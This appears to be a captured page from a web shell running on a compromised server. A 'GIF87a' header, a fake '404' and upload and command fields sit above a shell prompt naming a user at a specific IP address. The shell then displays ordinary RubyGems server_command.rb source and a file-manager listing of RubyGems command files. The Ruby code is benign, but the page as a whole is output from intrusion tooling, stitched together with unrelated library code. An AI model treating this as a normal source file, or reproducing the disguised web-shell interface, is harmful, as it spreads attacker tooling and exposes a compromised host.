GIF87a; 404

MY HEART




Upload:

Command:

diavoloapp@3.138.137.25: ~ $
require 'rubygems/command'
require 'rubygems/server'

class Gem::Commands::ServerCommand < Gem::Command

  def initialize
    super 'server', 'Documentation and gem repository HTTP server',
          :port => 8808, :gemdir => [], :daemon => false

    OptionParser.accept :Port do |port|
      if port =~ /\A\d+\z/ then
        port = Integer port
        raise OptionParser::InvalidArgument, "#{port}: not a port number" if
          port > 65535

        port
      else
        begin
          Socket.getservbyname port
        rescue SocketError
          raise OptionParser::InvalidArgument, "#{port}: no such named service"
        end
      end
    end

    add_option '-p', '--port=PORT', :Port,
               'port to listen on' do |port, options|
      options[:port] = port
    end

    add_option '-d', '--dir=GEMDIR',
               'directories from which to serve gems',
               'multiple directories may be provided' do |gemdir, options|
      options[:gemdir] << File.expand_path(gemdir)
    end

    add_option '--[no-]daemon', 'run as a daemon' do |daemon, options|
      options[:daemon] = daemon
    end

    add_option '-b', '--bind=HOST,HOST',
               'addresses to bind', Array do |address, options|
      options[:addresses] ||= []
      options[:addresses].push(*address)
    end

    add_option '-l', '--launch[=COMMAND]',
               'launches a browser window',
               "COMMAND defaults to 'start' on Windows",
               "and 'open' on all other platforms" do |launch, options|
      launch ||= Gem.win_platform? ? 'start' : 'open'
      options[:launch] = launch
    end
  end

  def defaults_str # :nodoc:
    "--port 8808 --dir #{Gem.dir} --no-daemon"
  end

  def description # :nodoc:
    <<-EOF
The server command starts up a web server that hosts the RDoc for your
installed gems and can operate as a server for installation of gems on other
machines.

The cache files for installed gems must exist to use the server as a source
for gem installation.

To install gems from a running server, use `gem install GEMNAME --source
http://gem_server_host:8808`

You can set up a shortcut to gem server documentation using the URL:

  http://localhost:8808/rdoc?q=%s - Firefox
  http://localhost:8808/rdoc?q=* - LaunchBar

    EOF
  end

  def execute
    options[:gemdir] = Gem.path if options[:gemdir].empty?
    Gem::Server.run options
  end

end


Filemanager

Name Type Size Permission Actions
build_command.rb File 859 B 0644
cert_command.rb File 6.41 KB 0644
check_command.rb File 2.01 KB 0644
cleanup_command.rb File 3.82 KB 0644
contents_command.rb File 3.12 KB 0644
dependency_command.rb File 3.89 KB 0644
environment_command.rb File 4.16 KB 0644
fetch_command.rb File 1.49 KB 0644
generate_index_command.rb File 2.52 KB 0644
help_command.rb File 4.56 KB 0644
install_command.rb File 5.45 KB 0644
list_command.rb File 696 B 0644
lock_command.rb File 2.67 KB 0644
mirror_command.rb File 395 B 0644
outdated_command.rb File 866 B 0644
owner_command.rb File 1.9 KB 0644
pristine_command.rb File 3.66 KB 0644
push_command.rb File 2.02 KB 0644
query_command.rb File 8.11 KB 0644
rdoc_command.rb File 2.31 KB 0644
search_command.rb File 616 B 0644
server_command.rb File 2.35 KB 0644
setup_command.rb File 12.94 KB 0644
sources_command.rb File 3.62 KB 0644
specification_command.rb File 2.93 KB 0644
stale_command.rb File 704 B 0644
uninstall_command.rb File 3.07 KB 0644
unpack_command.rb File 4.06 KB 0644
update_command.rb File 5.8 KB 0644
which_command.rb File 1.87 KB 0644
yank_command.rb File 2.4 KB 0644